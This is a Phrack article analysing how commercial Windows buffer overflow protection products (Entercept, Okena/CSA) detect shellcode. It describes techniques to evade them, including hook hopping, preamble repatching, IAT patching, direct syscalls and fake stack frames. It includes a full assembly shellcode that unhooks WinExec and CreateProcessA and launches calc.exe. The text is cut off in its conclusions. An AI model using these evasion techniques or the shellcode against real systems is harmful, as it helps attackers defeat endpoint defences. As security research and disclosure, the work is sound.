File: archives/62/p62_0x05_Bypassing Win BO Protection_by_jamie butler & anonymous author.txt | |
==Phrack Inc.== | |
Volume 0x0b, Issue 0x3e, Phile #0x05 of 0x10 | |
|=-----------------------------------------------------------------------=| | |
|=-----=[ Bypassing 3rd Party Windows Buffer Overflow Protection ]=------=| | |
|=-----------------------------------------------------------------------=| | |
|=--------------=[ anonymous <p62_wbo_a@author.phrack.org ]=-------------=| | |
|=--------------=[ Jamie Butler <james.butler@hbgary.com> ]=-------------=| | |
|=--------------=[ anonymous <p62_wbo_b@author.phrack.org ]=-------------=| | |
--[ Contents | |
1 - Introduction | |
2 - Stack Backtracing | |
3 - Evading Kernel Hooks | |
3.1 - Kernel Stack Backtracing | |
3.2 - Faking Stack Frames | |
4 - Evading Userland Hooks | |
4.1 - Implementation Problems - Incomplete API Hooking | |
4.1.1 - Not Hooking All API Versions
4.1.2 - Not Hooking Deeply Enough | |
4.1.3 - Not Hooking Thoroughly Enough | |
4.2 - Fun With Trampolines | |
4.2.1 - Patch Table Jumping
4.2.2 - Hook Hopping
4.3 - Repatching Win32 APIs | |
4.4 - Attacking Userland Components | |
4.4.1 - IAT Patching
4.4.2 - Data Section Patching
4.5 - Calling Syscalls Directly | |
4.6 - Faking Stack Frames | |
5 - Conclusions | |
--[ 1 - Introduction | |
Recently, a number of commercial security systems started to offer | |
protection against buffer overflows. This paper analyzes the protection | |
claims and describes several techniques to bypass the buffer overflow | |
protection. | |
Existing commercial systems implement a number of techniques to protect | |
against buffer overflows. Currently, stack backtracing is the most popular | |
one. It is also the easiest to implement and the easiest to bypass. | |
Several commercial products such as Entercept (now NAI Entercept) and | |
Okena (now Cisco Security Agent) implement this technique. | |
--[ 2 - Stack Backtracing | |
Most of the existing commercial security systems do not actually prevent
buffer overflows but rather attempt to detect the execution of
shellcode.
The most common technology used to detect shellcode is code page | |
permission checking which involves checking whether code is executing on | |
a writable page of memory. This is necessary since architectures such as | |
x86 do not support the non-executable memory bit. | |
Some systems also perform additional checking to see whether the code's
page of memory belongs to a memory mapped file section and not to an
anonymous memory section.
[-----------------------------------------------------------] | |
page = get_page_from_addr( code_addr ); | |
if (page->permissions & WRITABLE) | |
return BUFFER_OVERFLOW; | |
ret = page_originates_from_file( page ); | |
if (ret != TRUE) | |
return BUFFER_OVERFLOW; | |
[-----------------------------------------------------------] | |
Pseudo code for code page permission checking | |
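The check above can be modelled in a few lines of Python. This is only a
sketch over a toy page table: the Page record, the page numbers and the
decision to treat an unmapped address as suspicious are assumptions made
for illustration, not the behaviour of any particular product.

```python
from dataclasses import dataclass

BUFFER_OVERFLOW = "BUFFER_OVERFLOW"
OK = "OK"
PAGE_SIZE = 0x1000


@dataclass
class Page:
    writable: bool      # page can be written to
    file_backed: bool   # page belongs to a memory mapped file section


def check_code_page(pages, code_addr):
    """Classify code_addr the way the pseudo code above does."""
    page = pages.get(code_addr // PAGE_SIZE)
    if page is None:
        # Assumption: an unmapped address is treated as suspicious.
        return BUFFER_OVERFLOW
    if page.writable:
        return BUFFER_OVERFLOW
    if not page.file_backed:
        return BUFFER_OVERFLOW
    return OK


# Toy address space keyed by page number (all values hypothetical).
pages = {
    0x77E80: Page(writable=False, file_backed=True),   # DLL code section
    0x0012F: Page(writable=True, file_backed=False),   # thread stack
    0x00350: Page(writable=False, file_backed=False),  # read-only anonymous
}

print(check_code_page(pages, 0x77E80123))  # OK
print(check_code_page(pages, 0x0012FF00))  # BUFFER_OVERFLOW
```

Note that the read-only anonymous page is rejected only by the second
test, which is why some systems add the file section check at all.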
Buffer overflow protection technologies (BOPT) that rely on stack | |
backtracing don't actually create non-executable heap and stack segments. | |
Instead they hook the OS and check for shellcode execution during the | |
hooked API calls. | |
Most operating systems can be hooked in userland or in the kernel.
The next section deals with evading kernel hooks, while section 4 deals
with bypassing userland hooks.
--[ 3 - Evading Kernel Hooks | |
When hooking the kernel, Host Intrusion Prevention Systems (HIPS) must | |
be able to detect where a userland API call originated. Due to | |
the heavy use of kernel32.dll and ntdll.dll libraries, an API call is | |
usually several stack frames away from the actual syscall trap call. | |
For this reason, some intrusion prevention systems rely on using stack
backtracing to locate the original caller of a system call.
----[ 3.1 - Kernel Stack Backtracing | |
While stack backtracing can occur from either userland or kernel, it is | |
far more important for the kernel components of a BOPT than its userland | |
components. The existing commercial BOPT's kernel components rely entirely | |
on stack backtracing to detect shellcode execution. Therefore, evading a | |
kernel hook is simply a matter of defeating the stack backtracing | |
mechanism. | |
Stack backtracing involves traversing stack frames and verifying that the | |
return addresses pass the buffer overflow detection tests described above. | |
Frequently, there is also an additional "return into libc" check, which | |
involves checking that a return address points to an instruction | |
immediately following a call or a jump. The basic operation of stack | |
backtracing code, as used by a BOPT, is presented below. | |
[-----------------------------------------------------------] | |
while (is_valid_frame_pointer( ebp )) { | |
ret_addr = get_ret_addr( ebp ); | |
if (check_code_page(ret_addr) == BUFFER_OVERFLOW) | |
return BUFFER_OVERFLOW; | |
if (does_not_follow_call_or_jmp_opcode(ret_addr)) | |
return BUFFER_OVERFLOW; | |
ebp = get_next_frame( ebp ); | |
} | |
[-----------------------------------------------------------] | |
Pseudo code for BOPT stack backtracing | |
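To make the loop concrete, here is a minimal Python model of it. The
stack is a plain dictionary from address to 32-bit value, and the two
predicates stand in for check_code_page() and the "follows a call or
jmp" test; all names, addresses and the frame limit are illustrative
assumptions. The model also returns the list of return addresses it
inspected, which makes it easy to see where the walk stops.

```python
BUFFER_OVERFLOW = "BUFFER_OVERFLOW"
OK = "OK"


def backtrace(stack, ebp, code_page_ok, follows_call, max_frames=64):
    """Walk saved-EBP links; return (verdict, return addresses checked).

    A frame at `ebp` holds the saved EBP at [ebp] and the return
    address at [ebp+4], as in the stack diagram in this section.
    """
    checked = []
    for _ in range(max_frames):
        # is_valid_frame_pointer: here simply "both slots exist" (assumption)
        if ebp not in stack or ebp + 4 not in stack:
            break
        ret_addr = stack[ebp + 4]
        checked.append(ret_addr)
        if not code_page_ok(ret_addr):
            return BUFFER_OVERFLOW, checked
        if not follows_call(ret_addr):
            return BUFFER_OVERFLOW, checked
        ebp = stack[ebp]  # get_next_frame
    return OK, checked


# Hypothetical layout: one image range counts as "good" code pages.
image = range(0x77E80000, 0x77F00000)
code_page_ok = lambda addr: addr in image
follows_call = lambda addr: True  # assume every image address passes

stack = {
    0x0012FF00: 0x0012FF20, 0x0012FF04: 0x77E81234,  # frame 1 -> frame 2
    0x0012FF20: 0x00000000, 0x0012FF24: 0x0012FF80,  # frame 2 returns to stack
}

print(backtrace(stack, 0x0012FF00, code_page_ok, follows_call))
```

With the frames linked as above, the second return address is inspected
and flagged. If the saved EBP in the first frame is replaced with an
invalid value such as 0, the loop ends after one frame and the second
return address is never looked at.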
When discussing how to evade stack backtracing, it is important to | |
understand how stack backtracing works on an x86 architecture. A typical | |
stack frame looks as follows during a function call: | |
: : | |
|-------------------------| | |
| function B parameter #2 | | |
|-------------------------| | |
| function B parameter #1 | | |
|-------------------------| | |
| return EIP address | | |
|-------------------------| | |
| saved EBP | | |
|=========================| | |
| function A parameter #2 | | |
|-------------------------| | |
| function A parameter #1 | | |
|-------------------------| | |
| return EIP address | | |
|-------------------------| | |
| saved EBP | | |
|-------------------------| | |
: : | |
The EBP register points to the next stack frame. Without the EBP register | |
it is very hard, if not impossible, to correctly identify and trace | |
through all the stack frames. | |
Modern compilers often omit the use of EBP as a frame pointer and use it | |
as a general purpose register instead. With an EBP optimization, a stack | |
frame looks as follows during a function call: | |
|-----------------------| | |
| function parameter #2 | | |
|-----------------------| | |
| function parameter #1 | | |
|-----------------------| | |
| return EIP address | | |
|-----------------------| | |
Notice that no saved EBP value is present on the stack. Without a saved
EBP it is not possible for the buffer overflow detection technologies
to accurately perform stack backtracing. This makes their task incredibly
hard as a simple return into libc style attack will bypass the protection.
Simply originating an API call one layer higher than the BOPT hook defeats
the detection technique.
----[ 3.2 - Faking Stack Frames | |
Since the stack is under complete control of the shellcode, it is possible | |
to completely alter its contents prior to an API call. Specially crafted | |
stack frames can be used to bypass the buffer overflow detectors. | |
As was explained previously, the buffer overflow detector is looking for | |
three key indicators of legitimate code: read-only page permissions, | |
memory mapped file section and a return address pointing to an instruction | |
immediately following a call or jmp. Since function pointers change | |
calling semantics, BOPT do not (and cannot) check that a call or jmp | |
actually points to the API being called. Most importantly, the BOPT cannot | |
check return addresses beyond the last valid EBP frame pointer | |
(it cannot stack backtrace any further). | |
Evading a BOPT is therefore simply a matter of creating a "final" stack | |
frame which has a valid return address. This valid return address must | |
point to an instruction residing in a read-only memory mapped file section | |
and immediately following a call or jmp. Provided that the dummy return | |
address is reasonably close to a second return address, the shellcode can | |
easily regain control. | |
The ideal instruction sequence to point the dummy return address to is: | |
[-----------------------------------------------------------] | |
jmp [eax] ; or call [eax], or another register | |
dummy_return: ... ; some number of nops or easily | |
; reversed instructions, e.g. inc eax | |
ret ; any return will do, e.g. ret 8 | |
[-----------------------------------------------------------] | |
Bypassing kernel BOPT components is easy because they must rely on user | |
controlled data (the stack) to determine the validity of an API call. By | |
correctly manipulating the stack, it is possible to prematurely terminate | |
the stack return address analysis. | |
This stack backtracing evasion technique is also effective against | |
userland hooks (see section 4.6). | |
--[ 4 - Evading Userland Hooks | |
Given the presence of the correct instruction sequence in a valid region | |
of memory, it is possible to trivially bypass kernel buffer overflow | |
protection techniques. Similar techniques can be used to bypass userland | |
BOPT components. In addition, since the shellcode executes with the same | |
permissions as the userland hooks, a number of other techniques can be | |
used to evade the detection. | |
----[ 4.1 - Implementation Problems - Incomplete API Hooking | |
There are many problems with the userland based buffer overflow protection
technologies. For example, they require the buffer overflow protection
code to be in the code path of all of the attacker's calls, or the
shellcode execution will go undetected.
Trying to determine what an attacker will do with his or her shellcode | |
a priori is an extremely hard problem, if not an impossible one. Getting | |
on the right path is not easy. Some of the obstacles in the way include: | |
a. Not accounting for both UNICODE and ANSI versions of a Win32 API | |
call. | |
b. Not following the chaining nature of API calls. For example, | |
many functions in kernel32.dll are nothing more than wrappers for | |
other functions within kernel32.dll or ntdll.dll. | |
c. The constantly changing nature of the Microsoft Windows API. | |
--------[ 4.1.1 - Not Hooking All API Versions | |
A commonly encountered mistake with userland API hooking
implementations is incomplete code path coverage. In order for API
interception based products to be effective, all APIs utilized by
attackers must be hooked. This requires the buffer overflow protection
technology to hook somewhere along the code path an attacker _has_ to
take. However, as will be shown, once an attacker has begun executing
code, it becomes very difficult for third party systems to cover all
code paths. Indeed, no tested commercial buffer overflow detector actually
provided effective code path coverage.
Many Windows API functions have two versions: ANSI and UNICODE. The ANSI | |
function names usually end in A, and UNICODE functions end in W because | |
of their wide character nature. The ANSI functions are often nothing | |
more than wrappers that call the UNICODE version of the API. For example, | |
CreateFileA takes the ANSI file name that was passed as a parameter and
turns it into a UNICODE string. It then calls CreateFileW. Unless a
vendor hooks both the UNICODE and ANSI version of the API function, an | |
attacker can bypass the protection mechanism by simply calling the other | |
version of the function. | |
For example, Entercept 4.1 hooks LoadLibraryA, but it makes no attempt | |
to intercept LoadLibraryW. If a protection mechanism was only going to | |
hook one version of a function, it would make more sense to hook the | |
UNICODE version. For this particular function, Okena/CSA does a better | |
job by hooking LoadLibraryA, LoadLibraryW, LoadLibraryExA, and | |
LoadLibraryExW. Unfortunately for the third party buffer overflow | |
detectors, simply hooking more functions in kernel32.dll is not enough. | |
--------[ 4.1.2 - Not Hooking Deeply Enough | |
In Windows NT, kernel32.dll acts as a wrapper for ntdll.dll and yet many | |
buffer overflow detection products do not hook functions within ntdll.dll. | |
This simple error is similar to not hooking both the UNICODE and ANSI
versions of a function. An attacker can simply call ntdll.dll directly
and completely bypass all the kernel32.dll "checkpoints" established by a
buffer overflow detector.
For example, NAI Entercept tries to detect shellcode calling | |
GetProcAddress() in kernel32.dll. However, the shellcode can be rewritten | |
to call LdrGetProcedureAddress() in ntdll.dll, which will accomplish the | |
same goal, and at the same time never pass through the NAI Entercept hook. | |
Similarly, shellcode can completely bypass userland hooks altogether and | |
make system calls directly (see section 4.5). | |
--------[ 4.1.3 - Not Hooking Thoroughly Enough | |
The interactions between the various Win32 API functions are
byzantine, complex and difficult to understand. A vendor need make only
one mistake in order to create a window of opportunity for an attacker.
For example, Okena/CSA and NAI Entercept both hook WinExec to try to
prevent an attacker's shellcode from spawning a process.
The call path for WinExec looks like this: | |
WinExec() --> CreateProcessA() --> CreateProcessInternalA() | |
Okena/CSA and NAI Entercept hook both WinExec() and CreateProcessA() | |
(see Appendix A and B). However, neither product hooks | |
CreateProcessInternalA() (exported by kernel32.dll). When writing
shellcode, an attacker could find the export for
CreateProcessInternalA() and use it instead of calling WinExec().
CreateProcessA() pushes two NULLs onto the stack before calling
CreateProcessInternalA(). Thus shellcode only needs to push two NULLs
and then call CreateProcessInternalA() directly to evade the userland
API hooks of both products.
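The coverage problem can be phrased as a graph question: is there any
call path from an exported function to the function doing the real work
that crosses no hook? The Python sketch below answers it for the WinExec
chain described above. The call graph contains only the three functions
named in the text, and the helper name unhooked_paths is made up for the
example.

```python
def unhooked_paths(calls, hooked, entry_points, sink):
    """Return every call path from an entry point to `sink` with no hook."""
    found = []

    def walk(name, path):
        if name in hooked or name in path:  # stopped by a hook, or a cycle
            return
        path = path + [name]
        if name == sink:
            found.append(path)
            return
        for callee in calls.get(name, ()):
            walk(callee, path)

    for entry in entry_points:
        walk(entry, [])
    return found


# Call chain taken from the text; every function here is exported.
calls = {
    "WinExec": ["CreateProcessA"],
    "CreateProcessA": ["CreateProcessInternalA"],
}
exports = ["WinExec", "CreateProcessA", "CreateProcessInternalA"]

hooked = {"WinExec", "CreateProcessA"}
print(unhooked_paths(calls, hooked, exports, "CreateProcessInternalA"))
# [['CreateProcessInternalA']]
```

An empty result means every path to the sink is covered. Hooking only
the top of a chain never produces an empty result as long as a deeper
function remains callable on its own.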
As new DLLs and APIs are released, the complexity of Win32 API internal | |
interactions increases, making the problem worse. Third party product | |
vendors are at a severe disadvantage when implementing their buffer | |
overflow detection technologies and are bound to make mistakes which | |
can be exploited by attackers. | |
----[ 4.2 - Fun With Trampolines | |
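Most Win32 API functions begin with the same short preamble. First, EBP
is pushed onto the stack, then ESP is moved into EBP. These two
instructions occupy three bytes; the instructions that follow them vary
from function to function.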
[-----------------------------------------------------------] | |
Code Bytes Assembly | |
55 push ebp | |
8bec mov ebp, esp | |
[-----------------------------------------------------------] | |
Both Okena/CSA and Entercept use inline function hooking. They overwrite | |
the first 5 bytes of a function with an immediate unconditional jump or | |
call. For example, this is what the first few bytes of WinExec() look like | |
after NAI Entercept's hooks have been installed: | |
[-----------------------------------------------------------] | |
Code Bytes Assembly | |
e8 xx xx xx xx call xxxxxxxx | |
54 push esp | |
53 push ebx | |
56 push esi | |
57 push edi | |
[-----------------------------------------------------------] | |
Alternatively, the first few bytes could be overwritten with a jump | |
instruction: | |
[-----------------------------------------------------------] | |
Code Bytes Assembly | |
e9 xx xx xx xx jmp xxxxxxxx | |
... | |
[-----------------------------------------------------------] | |
Obviously, it is easy for shellcode to test for these and other signatures | |
before calling a function. If a hijacking mechanism is detected, the | |
shellcode can use several different techniques to bypass the hook. | |
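The signatures shown above are simple enough to recognise from the first
few bytes of a function. As a rough illustration, the following Python
sketch classifies a byte string and, for a call or jmp, computes where
the relative branch leads. It only looks at the three patterns listed in
this section; the function names and sample addresses are assumptions,
and a real hook could use other instruction sequences.

```python
import struct

STANDARD_PREAMBLE = bytes.fromhex("558bec")  # push ebp / mov ebp, esp


def classify_entry(code: bytes) -> str:
    """Classify the first bytes of a function body."""
    if len(code) < 5:
        return "too short"
    if code[0] == 0xE8:
        return "call rel32"
    if code[0] == 0xE9:
        return "jmp rel32"
    if code.startswith(STANDARD_PREAMBLE):
        return "standard preamble"
    return "unknown"


def rel32_target(code: bytes, address: int) -> int:
    """Destination of a 5-byte call/jmp rel32 located at `address`."""
    (displacement,) = struct.unpack_from("<i", code, 1)
    # The displacement is relative to the end of the 5-byte instruction.
    return (address + 5 + displacement) & 0xFFFFFFFF


print(classify_entry(bytes.fromhex("558bec83ec54")))      # standard preamble
print(classify_entry(bytes.fromhex("e8100000005453")))    # call rel32
print(hex(rel32_target(bytes.fromhex("e810000000"), 0x77E80000)))  # 0x77e80015
```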
------[ 4.2.1 - Patch Table Jumping | |
When an API is hooked, the original preamble is saved into a table so that | |
the buffer overflow detector can recreate the original API after | |
performing its validation checks. The preamble is stored in a patch table, | |
which resides somewhere in the address space of an application. When | |
shellcode detects the presence of an API hook, it can simply search for | |
the patch table and make its calls to patch table entries. This | |
completely avoids the hook, preventing the userland buffer overflow | |
detector components from ever being in the attacker's call path. | |
------[ 4.2.2 - Hook Hopping | |
Alternatively, instead of locating the patch table, shellcode can include
its own copy of the original pre-hook preamble. After executing its own
API preamble, the shellcode can transfer execution to the first intact
instruction after the API hook.
The hook overwrites five bytes, but since Intel x86 has variable length
instructions, the jump must land on an instruction boundary. In WinExec()
the original preamble spans six bytes, so the example below jumps to
WinExec+6 rather than WinExec+5:
[-----------------------------------------------------------] | |
Shellcode: | |
call WinExecPreamble | |
WinExecPreamble: | |
push ebp | |
mov ebp, esp | |
sub esp, 54h
jmp WinExec+6 | |
[-----------------------------------------------------------] | |
This technique will not work if another function within the call path | |
is also hooked. In this case, Entercept also hooks CreateProcessA(), | |
which WinExec() calls. Thus, to evade detection shellcode should call | |
CreateProcessA() using the stored copy of CreateProcessA's preamble. | |
----[ 4.3 - Repatching Win32 APIs | |
Thoroughly hooking Win32 APIs is not effective when certain fundamental | |
errors are made in the implementation of a userland buffer overflow | |
detection component. | |
Certain implementations (NAI Entercept) have a serious problem with the | |
way they perform their API hooking. In order to be able to overwrite | |
preambles of hooked functions, the code section for a DLL has to be made | |
writable. Entercept marks code sections of kernel32.dll and ntdll.dll as | |
writable in order to be able to modify their contents. However, Entercept | |
never resets the writable bit! | |
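Whether a hooking component has left code pages writable is easy to audit
once the protection value of each region is known. The Python sketch
below works on a list of (base address, protection) pairs, for example as
they might be collected with VirtualQuery(); the region list is made up
for illustration. The numeric constants are the standard Windows PAGE_*
protection values.

```python
PAGE_READWRITE = 0x04
PAGE_WRITECOPY = 0x08
PAGE_EXECUTE_READ = 0x20
PAGE_EXECUTE_READWRITE = 0x40
PAGE_EXECUTE_WRITECOPY = 0x80
PAGE_GUARD = 0x100

WRITABLE = {
    PAGE_READWRITE,
    PAGE_WRITECOPY,
    PAGE_EXECUTE_READWRITE,
    PAGE_EXECUTE_WRITECOPY,
}


def writable_regions(regions):
    """Return the base address of every region whose protection is writable.

    regions: iterable of (base_address, protect) pairs describing the
    code section of a module.
    """
    # The low byte carries the access type; modifiers such as PAGE_GUARD
    # live in the higher bits and are masked off.
    return [base for base, protect in regions if (protect & 0xFF) in WRITABLE]


# Hypothetical snapshot of code regions in two modules.
regions = [
    (0x77E81000, PAGE_EXECUTE_READ),
    (0x77E82000, PAGE_EXECUTE_READWRITE),        # left writable after hooking
    (0x77F51000, PAGE_EXECUTE_READ | PAGE_GUARD),
]

print([hex(base) for base in writable_regions(regions)])  # ['0x77e82000']
```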
Due to this serious security flaw, it is possible for an attacker to | |
overwrite the API hook by re-injecting the original preamble code. For | |
the WinExec() and CreateProcessA() examples, this would require | |
overwriting the first 6 bytes (just to be instruction aligned) of | |
WinExec() and CreateProcessA() with the original preamble. | |
[-----------------------------------------------------------] | |
WinExecOverWrite: | |
Code Bytes Assembly | |
55 push ebp | |
8bec mov ebp, esp | |
83ec54 sub esp, 54 | |
CreateProcessAOverWrite: | |
Code Bytes Assembly | |
55 push ebp | |
8bec mov ebp, esp | |
ff752c push DWORD PTR [ebp+2c] | |
[-----------------------------------------------------------] | |
This technique will not work against properly implemented buffer overflow
detectors; however, it is very effective against NAI Entercept. A complete
shellcode example which overwrites the NAI Entercept hooks is presented
below:
[-----------------------------------------------------------] | |
// This sample code overwrites the preamble of WinExec and | |
// CreateProcessA to avoid detection. The code then | |
// calls WinExec with a "calc.exe" parameter. | |
// The code demonstrates that by overwriting function | |
// preambles, it is able to evade Entercept and Okena/CSA | |
// buffer overflow protection. | |
_asm { | |
pusha | |
jmp JUMPSTART | |
START: | |
pop ebp | |
xor eax, eax | |
mov al, 0x30 | |
mov eax, fs:[eax]; | |
mov eax, [eax+0xc]; | |
// We now have the module_item for ntdll.dll | |
mov eax, [eax+0x1c] | |
// We now have the module_item for kernel32.dll | |
mov eax, [eax] | |
// Image base of kernel32.dll | |
mov eax, [eax+0x8] | |
movzx ebx, word ptr [eax+3ch] | |
// pe.oheader.directorydata[EXPORT=0] | |
mov esi, [eax+ebx+78h] | |
lea esi, [eax+esi+18h] | |
// EBX now has the base module address | |
mov ebx, eax | |
lodsd | |
// ECX now has the number of function names | |
mov ecx, eax | |
lodsd | |
add eax,ebx | |
// EDX has addresses of functions | |
mov edx,eax | |
lodsd | |
// EAX has address of names | |
add eax,ebx | |
// Save off the number of named functions | |
// for later | |
push ecx | |
// Save off the address of the functions | |
push edx | |
RESETEXPORTNAMETABLE: | |
xor edx, edx | |
INITSTRINGTABLE: | |
mov esi, ebp // Beginning of string table | |
inc esi | |
MOVETHROUGHTABLE: | |
mov edi, [eax+edx*4] | |
add edi, ebx // EBX has the process base address | |
xor ecx, ecx | |
mov cl, BYTE PTR [ebp] | |
test cl, cl | |
jz DONESTRINGSEARCH | |
STRINGSEARCH: // ESI points to the function string table | |
repe cmpsb | |
je Found | |
// The number of named functions is on the stack | |
cmp [esp+4], edx | |
je NOTFOUND | |
inc edx | |
jmp INITSTRINGTABLE | |
Found: | |
pop ecx | |
shl edx, 2 | |
add edx, ecx | |
mov edi, [edx] | |
add edi, ebx | |
push edi | |
push ecx | |
xor ecx, ecx | |
mov cl, BYTE PTR [ebp] | |
inc ecx | |
add ebp, ecx | |
jmp RESETEXPORTNAMETABLE | |
DONESTRINGSEARCH: | |
OverWriteCreateProcessA: | |
pop edi | |
pop edi | |
push 0x06 | |
pop ecx | |
inc esi | |
rep movsb | |
OverWriteWinExec: | |
pop edi | |
push edi | |
push 0x06 | |
pop ecx | |
inc esi | |
rep movsb | |
CallWinExec: | |
push 0x03 | |
push esi | |
call [esp+8] | |
NOTFOUND: | |
pop edx | |
STRINGEXIT: | |
pop ecx | |
popa; | |
jmp EXIT | |
JUMPSTART: | |
add esp, 0x1000 | |
call START | |
WINEXEC: | |
_emit 0x07 | |
_emit 'W' | |
_emit 'i' | |
_emit 'n' | |
_emit 'E' | |
_emit 'x' | |
_emit 'e' | |
_emit 'c' | |
CREATEPROCESSA: | |
_emit 0x0e | |
_emit 'C' | |
_emit 'r' | |
_emit 'e' | |
_emit 'a' | |
_emit 't' | |
_emit 'e' | |
_emit 'P' | |
_emit 'r' | |
_emit 'o' | |
_emit 'c' | |
_emit 'e' | |
_emit 's' | |
_emit 's' | |
_emit 'A' | |
ENDOFTABLE: | |
_emit 0x00 | |
WinExecOverWrite: | |
_emit 0x06 | |
_emit 0x55 | |
_emit 0x8b | |
_emit 0xec | |
_emit 0x83 | |
_emit 0xec | |
_emit 0x54 | |
CreateProcessAOverWrite: | |
_emit 0x06 | |
_emit 0x55 | |
_emit 0x8b | |
_emit 0xec | |
_emit 0xff | |
_emit 0x75 | |
_emit 0x2c | |
COMMAND: | |
_emit 'c' | |
_emit 'a' | |
_emit 'l' | |
_emit 'c' | |
_emit '.' | |
_emit 'e' | |
_emit 'x' | |
_emit 'e' | |
_emit 0x00 | |
EXIT: | |
_emit 0x90 | |
// Normally call ExitThread or something here | |
_emit 0x90 | |
} | |
[-----------------------------------------------------------] | |
----[ 4.4 - Attacking Userland Components | |
While evading the hooks and techniques used by userland buffer overflow | |
detector components is effective, there exist other mechanisms of | |
bypassing the detection. Because both the shellcode and the buffer | |
overflow detector are executing with the same privileges and in the same | |
address space, it is possible for shellcode to directly attack the | |
buffer overflow detector userland component. | |
Essentially, when attacking the buffer overflow detector userland
component the attacker is attempting to subvert the mechanism used to
perform the shellcode detection check. There are only two principal
techniques for shellcode validation checking. Either the data used for the
check is determined dynamically during each hooked API call, or the data
is gathered at process start up and then checked during each call.
In either case, it is possible for an attacker to subvert the process. | |
------[ 4.4.1 - IAT Patching | |
Rather than implementing their own versions of memory page information | |
functions, the commercial buffer overflow protection products simply use | |
the operating system APIs. In Windows NT, these are implemented in | |
ntdll.dll. These APIs will be imported into the userland component | |
(itself a DLL) via its PE Import Table. An attacker can patch vectors
within the import table to alter the location of an API to a function
supplied by the shellcode. By supplying its own version of the function
that the buffer overflow detector uses for validation checking, it is
trivial for an attacker to evade detection.
------[ 4.4.2 - Data Section Patching | |
For various reasons, a buffer overflow detector might use a pre-built | |
list of page permissions within the address space. When this is the | |
case, altering the address of the VirtualQuery() API is not effective. | |
To subvert the buffer overflow detector, the shellcode has to locate and | |
modify the data table used by the return address validation routines. | |
This is a fairly straightforward, although application specific, technique | |
for subverting buffer overflow prevention technologies. | |
----[ 4.5 - Calling Syscalls Directly | |
As mentioned above, rather than using ntdll.dll APIs to make system
calls, it is possible for an attacker to create shellcode which makes
system calls directly. While this technique is very effective against
userland components, it obviously cannot be used to bypass kernel based
buffer overflow detectors.
To take advantage of this technique you must understand what parameters a | |
kernel function uses. These may not always be the same as the parameters | |
required by the kernel32 or ntdll API versions. | |
Also, you must know the system call number of the function in question.
You can find this dynamically using a technique similar to the one used
to find function addresses. Once you have the address of the ntdll.dll
version of the function you want to call, index into the function one
byte and read the following DWORD. This is the system call number in the
system call table for the function. This is a common trick used by
rootkit developers.
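The "index one byte and read a DWORD" step works because the ntdll.dll
stubs in question start with a mov eax, imm32 instruction (opcode 0xB8
followed by a little-endian 32-bit value). A small Python sketch of the
decoding step follows; the stub bytes in the example are invented, since
real system call numbers differ between Windows versions.

```python
import struct


def syscall_number(stub: bytes):
    """Return the imm32 of a leading `mov eax, imm32`, or None.

    None is returned when the stub does not start with opcode 0xB8,
    for example because the first bytes have been replaced by a hook.
    """
    if len(stub) >= 5 and stub[0] == 0xB8:
        return struct.unpack_from("<I", stub, 1)[0]
    return None


# Hypothetical stub: mov eax, 0A1h followed by further instructions.
print(hex(syscall_number(bytes.fromhex("b8a10000008d542404"))))  # 0xa1
print(syscall_number(bytes.fromhex("e910000000")))               # None
```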
Here is the pseudo code for calling the NtReadFile system call directly:
... | |
xor eax, eax | |
// Optional Key | |
push eax | |
// Optional pointer to large integer with the file offset | |
push eax | |
push Length_of_Buffer | |
push Address_of_Buffer | |
// Before call make room for two DWORDs called the IoStatusBlock | |
push Address_of_IoStatusBlock | |
// Optional ApcContext | |
push eax | |
// Optional ApcRoutine | |
push eax | |
// Optional Event | |
push eax | |
// Required file handle | |
push hFile | |
// EAX must contain the system call number | |
mov eax, Found_Sys_Call_Num | |
// EDX needs the address of the userland stack | |
lea edx, [esp] | |
// Trap into the kernel | |
// (recent Windows NT versions use "sysenter" instead) | |
int 2e | |
----[ 4.6 - Faking Stack Frames | |
As described in section 3.2, kernel based stack backtracing can be
bypassed using fake frames. The same technique works against userland
based detectors.
To bypass both userland and kernel backtracing, shellcode can create a
fake stack frame without a saved ebp value on the stack. Since stack
backtracing relies on the presence of the saved ebp to find the next
stack frame, fake frames can stop backtracing code from tracing past
the fake frame.
Of course, generating a fake stack frame is not going to work when the | |
EIP register still points to shellcode which resides in a writable | |
memory segment. To bypass the protection code, shellcode needs to use | |
an address that lies in a non-writable memory segment. This presents | |
a problem since shellcode needs a way to eventually regain control of | |
the execution. | |
The trick to regaining control is to proxy the return to shellcode
through a "ret" instruction which resides in a non-writable memory
segment. A "ret" instruction can be found dynamically by searching
memory for a 0xC3 opcode.
Here is an illustration of a normal LoadLibrary("kernel32.dll") call | |
that originates from a writable memory segment: | |
push kernel32_string | |
call LoadLibrary | |
return_eip: | |
. | |
. | |
. | |
LoadLibrary: ; * see below for a stack illustration | |
. | |
. | |
. | |
ret ; return to stack-based return_eip | |
|------------------------------| | |
| address of "kernel32.dll" str| | |
|------------------------------| | |
| return address (return_eip) | | |
|------------------------------| | |
As explained before, the buffer overflow protection code executes before | |
LoadLibrary gets to run. Since the return address (return_eip) is in a | |
writable memory segment, the protection code logs the overflow | |
and terminates the process. | |
The next example illustrates the 'proxy through a "ret" instruction'
technique:
push return_eip | |
push kernel32_string | |
; fake "call LoadLibrary" call | |
push address_of_ret_instruction | |
jmp LoadLibrary | |
return_eip: | |
. | |
. | |
. | |
LoadLibrary: ; * see below for a stack illustration | |
. | |
. | |
. | |
ret ; return to non stack-based address_of_ret_instruction | |
address_of_ret_instruction: | |
. | |
. | |
. | |
ret ; return to stack-based return_eip | |
Once again, the buffer overflow protection code executes before
LoadLibrary gets to run. This time though, the stack is set up with a
return address pointing to a non-writable memory segment. In addition,
no saved ebp is present on the stack, so the protection code cannot
perform stack backtracing and determine that the return address in the
next stack frame points to a writable segment. This allows the shellcode
to call LoadLibrary, which returns to the "ret" instruction. In turn,
the "ret" instruction pops the next return address off the stack
(return_eip) and transfers control to it.
|------------------------------| | |
| return address (return_eip) | | |
|------------------------------| | |
| address of "kernel32.dll" str| | |
|------------------------------| | |
| address of "ret" instruction | | |
|------------------------------| | |
In addition, any number of arbitrarily complex fake stack frames can be
set up to further confuse the protection code.
Here is an example of a fake frame that uses a "ret 8" instruction
instead of a simple "ret":
|--------------------------------| | |
| return address | | |
|--------------------------------| | |
| address of "ret" instruction | <- fake frame 2 | |
|--------------------------------| | |
| any value | | |
|--------------------------------| | |
| address of "kernel32.dll" str | | |
|--------------------------------| | |
| address of "ret 8" instruction | <- fake frame 1 | |
|--------------------------------| | |
This causes an extra 32-bit value to be removed from the stack,
complicating any kind of analysis even further.
--[ 5 - Conclusions | |
The majority of commercial security systems do not actually prevent | |
buffer overflows but rather detect the execution of shellcode. The most | |
common technology used to detect shellcode is code page permission | |
